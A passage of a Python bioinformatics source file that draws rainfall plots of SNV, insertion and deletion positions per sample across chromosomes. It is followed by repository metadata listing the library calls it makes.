(pandas.DataFrame)\n :param chromosomes: a list of chromosomes to be plotted (default: None) (list of str)\n :param chrom_length: a list of chrom lengths (default: None) (list of int)\n :param ref_fasta: the path to the reference fasta file (default: None) (str)\n :param sample_names: the list of sample names to be plotted (default: None) (str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param muttypes: the list of mutation types to be plotted (default: [\"SNV\", \"INS\", \"DEL\"]) (any elements of the default list)\n :param unique_only: If True, only unique mutations are plotted for each sample. (default: False) (boolean)\n :param plot_range: the genomic range to be plotted (default: None, the whole genome is plotted) (str, example: \"chr9:123134-143441414\")\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n def get_default_chroms_with_len(ref_genome, chrom_list):\n \"\"\"\n Gets the length of chromosomes defined in chrom_list or if chrom_list is empty, gets the default list of chromosomes from a specified\n reference genome fasta file (set in ref_genome) with their length.\n\n :param ref_genome: The path to the reference genome fasta file.\n :param chrom_list: A predefined list of chromosomes to be included.\n :returns: (chrom, lens):\n - chrom: a list of detected chromosomes (list of str)\n - len: a list of their lengths (list of int)\n\n \"\"\"\n newchroms, newlens = [], []\n with open(ref_genome + '.fai') as f_h:\n for line in f_h:\n chrom, leng = line.split('\\t')[0], line.split('\\t')[1]\n if (chrom in chrom_list or len(chrom_list) == 0):\n newchroms.append(chrom)\n newlens.append(int(leng))\n if len(chrom_list) > 0:\n return chrom_list, [newlens[newchroms.index(c)] for c in chrom_list]\n else:\n return sorted(newchroms), [newlens[newchroms.index(c)] for c in sorted(newchroms)]\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n if chromosomes is None or chrom_length is None:\n if ref_fasta is None or not __os.path.isfile(ref_fasta):\n raise ValueError('Error: supply either \"chromosomes\" AND \"chrom_length\" or \"ref_fasta\" arguments.')\n else:\n if not __os.path.isfile(ref_fasta + '.fai'):\n error_msg = 'Error: No faidx file found for reference genome file \"' + ref_fasta + '\", cannot proceed.'\n error_msg += '\\n'\n error_msg += 'Use the samtools command: samtools faidx [ref.fasta]'\n raise ValueError(error_msg)\n else:\n if chromosomes is None:\n chromosomes = sorted(list(mutations_dataframe['chr'].unique()))\n chromosomes, chrom_length = get_default_chroms_with_len(ref_fasta, chromosomes)\n\n spectrum_colors = ['#03bcee', '#010101', '#e32926', '#999999', '#a1ce63', '#ebc6c4', '#79159e', '#ffcc00']\n mutation_types = ['C > A', 'G > T', 'C > G', 'G > C', 'C > T', 'G > A', 'T > A', 'A > T', 'T > C', 'A > G', 'T > G',\n 'A > C']\n\n if plot_range is not None:\n range_chr = plot_range.split(':')[0]\n if ':' in plot_range:\n range_posmin = int(plot_range.split(':')[1].split('-')[0])\n range_posmax = int(plot_range.split(':')[1].split('-')[1])\n else:\n range_posmin = 0\n range_posmax = chrom_length[chromosomes.index(range_chr)]\n if range_posmin == range_posmax:\n raise ValueError('Error: unreadable range format. Make sure to set the range either by chromosome '\n '(eg. \"chr9\") or by specific region (eg. \"chr9:164574-345346\").')\n\n if unique_only:\n mutations_dataframe = mutations_dataframe[~mutations_dataframe['sample_name'].str.contains(',')]\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n figs = []\n\n for sample in sample_names:\n mutation_types_dict = __get_rainfall_data_for_sample(\n mutations_dataframe[mutations_dataframe['sample_name'].str.contains(sample)],\n chromosomes, chrom_length)\n\n total_num_of_muts = 0\n if 'SNV' in muttypes:\n total_num_of_muts += sum([len(mutation_types_dict[k]) for k in range(6)])\n if 'INS' in muttypes:\n total_num_of_muts += len(mutation_types_dict[6])\n if 'DEL' in muttypes:\n total_num_of_muts += len(mutation_types_dict[7])\n\n if total_num_of_muts < 2:\n print('There are not enough mutations in sample ' + sample + ' for a rainfall plot to be created.')\n continue\n\n f, ax = __plt.subplots()\n f.set_size_inches(20, 10)\n\n max_value = 0\n\n plots = []\n legend_titles = []\n\n zeropoint = 0\n if plot_range is not None:\n zeropoint = sum(chrom_length[:chromosomes.index(range_chr)])\n\n if 'SNV' in muttypes:\n for i in range(6):\n plots.append(\n __plt.scatter(__np.array([u[0] for u in mutation_types_dict[i]]) - zeropoint,\n [u[1] for u in mutation_types_dict[i]],\n c=spectrum_colors[i], edgecolor=spectrum_colors[i], s=50))\n legend_titles.append(mutation_types[i * 2])\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[i]])])\n\n if 'INS' in muttypes:\n plots.append(__plt.scatter(__np.array([u[0] for u in mutation_types_dict[6]]) - zeropoint,\n [u[1] for u in mutation_types_dict[6]],\n c=spectrum_colors[6], edgecolor=spectrum_colors[6], s=50))\n legend_titles.append('INS')\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[6]])])\n if 'DEL' in muttypes:\n plots.append(__plt.scatter(__np.array([u[0] for u in mutation_types_dict[7]]) - zeropoint,\n [u[1] for u in mutation_types_dict[7]],\n c=spectrum_colors[7], edgecolor=spectrum_colors[7], s=50))\n legend_titles.append('DEL')\n max_value = __np.max([max_value, __np.max([u[1] for u in mutation_types_dict[7]])])\n\n ax.set_yscale('log')\n ax.yaxis.grid(True, c='lightgrey', lw=1.5, linestyle='dotted')\n if plot_range is not None:\n ax.set_xlim(range_posmin, range_posmax)\n else:\n ax.set_xlim(0, sum(chrom_length))\n ax.set_ylim(1, max_value * 1.1)\n ax.legend(tuple(plots),\n tuple(legend_titles),\n loc='center left', scatterpoints=1, bbox_to_anchor=(1, 0.5))\n\n if plot_range is None:\n for i in range(len(chrom_length)):\n __plt.plot((sum(chrom_length[:i]), sum(chrom_length[:i])), (1, 10e9), 'lightgray')\n ax.text((sum(chrom_length[:(i)]) + __np.float(chrom_length[i]) / 2) / sum(chrom_length), -0.1,\n chromosomes[i],\n verticalalignment='bottom', horizontalalignment='center',\n transform=ax.transAxes,\n color='gray', fontsize=12, rotation='vertical')\n else:\n ax.text(0.5, -0.1,\n range_chr,\n verticalalignment='bottom', horizontalalignment='center',\n transform=ax.transAxes,\n color='gray', fontsize=12)\n\n ax.set_ylabel('genomic distance of each mutation from the previous one\\n', size=15)\n ax.set_xlabel('\\n\\n\\ngenomic position of mutation', size=15)\n ax.yaxis.set_tick_params(labelsize=15)\n ax.xaxis.set_tick_params(labelsize=15)\n ax.set_title(sample + '\\n', size=15)\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n figs.append(f)\n __plt.show()\n __plt.close(f)\n\n return figs\n", "repo_name": "pipekorsi/isomut2py", "sub_path": "isomut2py/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 84681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 247, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 418, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 487, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 487, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 527, "usage_type": "call"}, {"api_name": "isomut2py.io.get_coverage_distribution", "line_number": 532, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 532, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path", "line_number": 537, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_cov_distribution_parameters_from_file", "line_number": 539, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 539, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 544, "usage_type": "call"}, {"api_name": "scipy.stats.norm.pdf", "line_number": 547, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 547, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 551, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 551, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 608, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 630, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 643, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 657, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 661, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 662, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 662, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 663, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 663, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 665, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 690, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 735, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 735, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 745, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 755, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 765, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 770, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 800, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 810, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 819, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 820, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 825, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 852, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 852, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 853, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 853, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 856, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 857, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 857, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 858, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 858, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 860, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 890, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 895, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_mutations", "line_number": 907, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 907, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 940, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 940, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 952, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 996, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 997, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 997, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 998, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 998, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1000, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1004, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1004, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1005, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1005, "usage_type": "name"}, {"api_name": "pandas.core", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "isomut2py.io.load_mutations", "line_number": 1044, "usage_type": "call"}, {"api_name": "isomut2py.io", "line_number": 1044, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 1054, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1061, "usage_type": "call"}, {"api_name": "seaborn.clustermap", "line_number": 1065, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1068, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1070, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1070, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1072, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1075, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1075, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1095, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1123, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1143, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 1149, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1157, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1174, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1181, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1199, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1235, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1239, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1243, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 1247, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1248, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1261, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1293, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1300, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1324, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1328, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1332, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 1332, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 1333, "usage_type": "call"}, {"api_name": "seaborn.axes_style", "line_number": 1338, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 1340, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 1342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 1345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1346, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 1349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 1350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1351, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 1357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1357, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1360, "usage_type": "name"}, {"api_name": "seaborn.set", "line_number": 1378, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1427, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1427, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 1431, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 1432, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1432, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 1436, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 1444, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1461, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1463, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1466, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1468, "usage_type": "name"}, {"api_name": "seaborn.set_style", "line_number": 1471, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 1491, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1510, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 1514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1537, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1537, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1539, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1539, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 1566, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 1628, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 1633, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1633, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1636, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1636, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 1688, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1688, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1703, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1703, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1703, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1707, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1710, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1710, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1710, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1714, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 1716, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1716, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1716, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1720, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 1735, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1735, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 1736, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 1754, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1756, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1756, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 1758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 1763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1763, "usage_type": "name"}]}